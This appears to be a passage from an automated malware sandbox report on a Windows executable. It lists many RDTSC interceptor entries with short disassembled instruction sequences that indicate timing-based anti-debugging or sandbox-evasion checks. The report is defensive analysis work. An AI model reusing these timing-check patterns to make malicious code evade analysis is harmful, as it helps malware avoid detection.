              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A3701 second address: 11A3707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A3707 second address: 11A3716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4200FD2916h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A3716 second address: 11A371C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A371C second address: 11A3762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F4200FD2924h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F4200FD2929h 0x00000015 pushad 0x00000016 jmp 00007F4200FD291Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11A92B8 second address: 11A92BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11AEE1F second address: 11AEE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11AEE25 second address: 11AEE34 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F420070EDE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11AEE34 second address: 11AEE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11ADF59 second address: 11ADF5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11ADF5D second address: 11ADF69 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4200FD2916h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11AE0E6 second address: 11AE0FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F420070EDEFh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11AE0FF second address: 11AE109 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4200FD291Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B7221 second address: 11B723A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F420070EDECh 0x0000000b js 00007F420070EDE6h 0x00000011 jc 00007F420070EDF2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B723A second address: 11B7278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4200FD2916h 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007F4200FD291Eh 0x00000012 pushad 0x00000013 popad 0x00000014 jnl 00007F4200FD2916h 0x0000001a jbe 00007F4200FD2918h 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007F4200FD2927h 0x00000027 push eax 0x00000028 push edx 0x00000029 pop edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B5301 second address: 11B530D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F420070EDE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B530D second address: 11B5324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD291Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B5324 second address: 11B5333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F420070EDE6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B5333 second address: 11B5339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B5339 second address: 11B533D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B533D second address: 11B5341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B5341 second address: 11B535F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F420070EDF3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B535F second address: 11B5368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B5368 second address: 11B5372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F420070EDE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B5919 second address: 11B5923 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B5923 second address: 11B5927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B5B85 second address: 11B5B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11B694E second address: 11B6958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F420070EDE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BA2E1 second address: 11BA310 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4200FD2918h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4200FD2929h 0x00000013 jbe 00007F4200FD2918h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BA310 second address: 11BA317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BA756 second address: 11BA75B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BA75B second address: 11BA761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BA761 second address: 11BA767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BA896 second address: 11BA8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 jg 00007F420070EDEEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BA8A7 second address: 11BA8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BAB92 second address: 11BABC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF5h 0x00000007 jmp 00007F420070EDEAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F420070EDEEh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BABC8 second address: 11BABCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BABCC second address: 11BABD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BABD4 second address: 11BABE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD291Ch 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BAD61 second address: 11BAD65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BAEE7 second address: 11BAEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BFAD4 second address: 11BFAD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11BFAD8 second address: 11BFADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11C83D8 second address: 11C83E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F420070EDE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11C83E4 second address: 11C83EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4200FD2916h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11C83EE second address: 11C83F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11C660A second address: 11C660E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11C660E second address: 11C6612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11C6A4F second address: 11C6A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11C6A53 second address: 11C6A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11C6A5B second address: 11C6A82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jp 00007F4200FD2916h 0x0000000d jmp 00007F4200FD2925h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11CF14A second address: 11CF169 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F420070EDF5h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11CF169 second address: 11CF16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1104825 second address: 110482B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11D077E second address: 11D0784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11D0784 second address: 11D0788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11D0788 second address: 11D07A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F4200FD2922h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11DD838 second address: 11DD86A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007F420070EDE6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F420070EDEDh 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 pushad 0x00000017 jc 00007F420070EDE6h 0x0000001d jmp 00007F420070EDEBh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E0216 second address: 11E021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E021B second address: 11E0225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F420070EDE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E0225 second address: 11E0229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E0229 second address: 11E022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E022F second address: 11E023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E023C second address: 11E0242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E0242 second address: 11E0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4200FD2916h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F4200FD2925h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E0264 second address: 11E0274 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F420070EDEBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E03C5 second address: 11E03D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4200FD2916h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11E672E second address: 11E6734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F6354 second address: 11F6361 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F6361 second address: 11F6388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jno 00007F420070EDFDh 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F6388 second address: 11F63BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD2924h 0x00000009 pop edi 0x0000000a jmp 00007F4200FD291Fh 0x0000000f jl 00007F4200FD291Eh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F64E5 second address: 11F64E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F64E9 second address: 11F64ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F64ED second address: 11F6517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F420070EDF9h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F6517 second address: 11F6521 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F6521 second address: 11F6539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F420070EDF3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F6539 second address: 11F6548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F4200FD2916h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F6548 second address: 11F654C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F6932 second address: 11F695C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F4200FD2916h 0x00000009 jnp 00007F4200FD2916h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4200FD2926h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F695C second address: 11F69A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F420070EDF9h 0x00000012 jmp 00007F420070EDF6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11F77F9 second address: 11F781E instructions: 0x00000000 rdtsc 0x00000002 js 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F4200FD291Ch 0x00000010 pushad 0x00000011 jl 00007F4200FD2916h 0x00000017 jnc 00007F4200FD2916h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11FC9DC second address: 11FC9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 12174E4 second address: 12174EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 12174EA second address: 12174F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 12174F5 second address: 12174F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 121A33F second address: 121A34F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F420070EDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 121A34F second address: 121A35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD291Bh 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 121A35F second address: 121A364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122E4E9 second address: 122E503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD2926h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122E503 second address: 122E526 instructions: 0x00000000 rdtsc 0x00000002 js 00007F420070EDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F420070EDF5h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122E526 second address: 122E541 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007F4200FD291Ch 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122E541 second address: 122E556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F420070EDEDh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122E6AD second address: 122E6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD291Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122E83B second address: 122E841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122E841 second address: 122E845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122E9CC second address: 122E9E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122EB59 second address: 122EB94 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4200FD2922h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4200FD2923h 0x0000000f jmp 00007F4200FD2922h 0x00000014 rdtsc
